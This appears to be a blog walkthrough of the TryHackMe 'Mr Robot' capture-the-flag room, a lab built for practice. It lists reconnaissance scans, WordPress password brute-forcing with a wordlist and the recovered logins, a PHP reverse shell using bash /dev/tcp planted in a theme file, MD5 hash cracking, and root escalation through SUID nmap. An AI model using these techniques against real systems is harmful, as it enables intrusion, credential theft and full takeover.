ratiros01

Jun 17, 2020

5 min read

TryHackMe: Mr Robot CTF

nmap -Pn <ip>

2. All scan

nmap -A -p 22,80,443 <ip>

3. Vulnerability scan

nmap --script vuln -p 22,80,443 <ip>

This is a wordpress site. There’s a robots.txt file

4. Access HTTP site

There’re commands that I can try.

prepare
fsociety
inform
question
wakeup
join

Seems like these commands are just for fun.

Viewing source of index page is not useful.

Inspecting element is not useful neither.

5. Access robots.txt

Download fsocity.dic

wget http://<ip>/fsocity.diccat fsocity.dic

This file may contain useful password.

Count lines of the file

wc -l fsocity.dic

Sort the file and remove duplication

sort fsocity.dic | uniq > sort_fsocity.dicwc -l sort_fsocity.dic

Access http://<ip>/key-1-of-3.txt

6. Nikto scan

nikto -h http://<ip>/ -nossl

7.Directory scan

dirb http://<ip>

Seems like it’s a wordpress site. Access one of scanned directories.

http://<ip>/0/

View source, nothing useful.

8. Wordpress scan

wpscan --url http://<ip>/0/ -et -ep -eu

Failed

Add another flag as suggestion

wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -eu

There’re 2 users: mich05654 and elliot.

9. Bruteforcing wordpress

wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic

Access http://<ip>/wp-login.php

Username -> mich05654:Dylan_2791

Can’t do anything with this user.

Let’s try elliot:ER28–0652

On Dashboard -> Users. Elliot is an administrator.

Let’s get the reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>

Go to appearance -> editor -> Put the code in 404.php

Create listener

nc -lvp 1234

Access 404.php

Now I have a shell.

cd /home/lscat key-2-of-3.txt

I don’t have permission to key2.

Read another file. It’s robot’s credential.

cat password.raw-md5

Crack with hashcat

hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txthashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show

Change to robot

su robot

Failed. I need TTY shell

Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Change to robot

su robot

Read key2

cat key-2-of-3.txt
1

Let’s do privilege escalation

Check if robot can run sudo.

sudo -l

I can’t run sudo.

Looking for SUID

find / -perm -u=s -type f 2>/dev/null

It’ nmap!!!

nmap --interactive!shid

Now I’m root.

cd /rootcat key-3-of-3.txt

More from ratiros01

OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Try Knowable

Recommended from Medium

Ofir Elarat

Postmortem — incident examination process

Robert Delwood

in

The Startup

Why I Don’t Like MSDN

Thekhai

The best way to predict the future is to engineer it.

Sascha Heyer

IonQ how to Implement and Run code for Quantum Hardware

Olio Apps

in

Olio Apps

Developer Wellness

Jeremy Tarling

Apache Spark and Hadoop on a Macbook Air running OSX Sierra

Tobi

Read computer science — now chasing a writing career

Mohammadreza Khorrami

Take a look git side by zsh

AboutHelpTermsPrivacy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

sam

TryHackMe Holo — Recon

Aman Chauhan

How to crack ssh password by hydra:

YaBoiTiller

Bye Week Blues — Jets Recap Through Week 14

blockchainxtech

HOW TO CONFIGURE BINANCE SMART CHAIN ON YOUR WALLET?

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Knowable